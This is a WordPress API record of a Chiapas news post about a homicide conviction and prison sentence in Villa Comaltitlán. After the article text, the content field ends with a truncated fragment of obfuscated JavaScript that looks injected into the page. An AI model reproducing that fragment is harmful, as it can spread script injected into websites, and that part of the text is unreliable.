{"id":24160,"date":"2025-09-24T02:18:07","date_gmt":"2025-09-24T02:18:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24160"},"modified":"2025-09-24T02:18:08","modified_gmt":"2025-09-24T02:18:08","slug":"poder-judicial-del-estado-impone-sentencia-condenatoria-por-el-delito-de-homicidio-calificado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24160","title":{"rendered":"Poder Judicial del Estado impone sentencia condenatoria por el delito de Homicidio Calificado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354-1024x678.jpg\" alt=\"\" class=\"wp-image-24161\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354-768x508.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000348354.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022\u2060 \u2060Sentencian a Gerardo \u201cN\u201d por su responsabilidad penal en los hechos ocurridos en el municipio de Villa Comaltitl\u00e1n.<\/p>\n\n\n\n<p>23 de septiembre del 2025. &#8211; El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria en contra de una persona del sexo masculino por el delito de Homicidio Calificado, cometido en agravio de una persona del sexo femenino con identidad reservada.<\/p>\n\n\n\n<p>Tras los hechos ocurridos en el municipio de Villa Comaltitl\u00e1n, Chiapas, el Juzgado de Control y Tribunal de Enjuiciamiento del distrito judicial de Huixtla determin\u00f3 imponerle a Gerardo \u201cN\u201d una pena de 18 a\u00f1os y nueve meses de prisi\u00f3n, adem\u00e1s del pago de la reparaci\u00f3n del da\u00f1o. Asimismo, no se le concedi\u00f3 ning\u00fan sustitutivo de la pena.<\/p>\n\n\n\n<p>Esto, derivado del desahogo de pruebas realizado por el \u00f3rgano t\u00e9cnico de investigaci\u00f3n y acusaci\u00f3n durante las audiencias orales, donde se logr\u00f3 acreditar la participaci\u00f3n y responsabilidad penal de Gerardo \u201cN\u201d.<\/p>\n\n\n\n<p>Con esta determinaci\u00f3n, el Poder Judicial del Estado, que preside Juan Carlos Moreno Guill\u00e9n, ratifica su compromiso con una justicia m\u00e1s humana, transparente, accesible y firme en su labor de combatir la impunidad y proteger el bienestar del tejido social.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022\u2060 \u2060Sentencian a Gerardo \u201cN\u201d por su responsabilidad penal en los hechos ocurridos en el municipio de Villa Comaltitl\u00e1n. 23 de septiembre del 2025. &#8211; El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria en contra de una persona del sexo masculino por el delito de Homicidio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24161,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24160","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24160"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24160\/revisions"}],"predecessor-version":[{"id":24162,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24160\/revisions\/24162"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24161"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}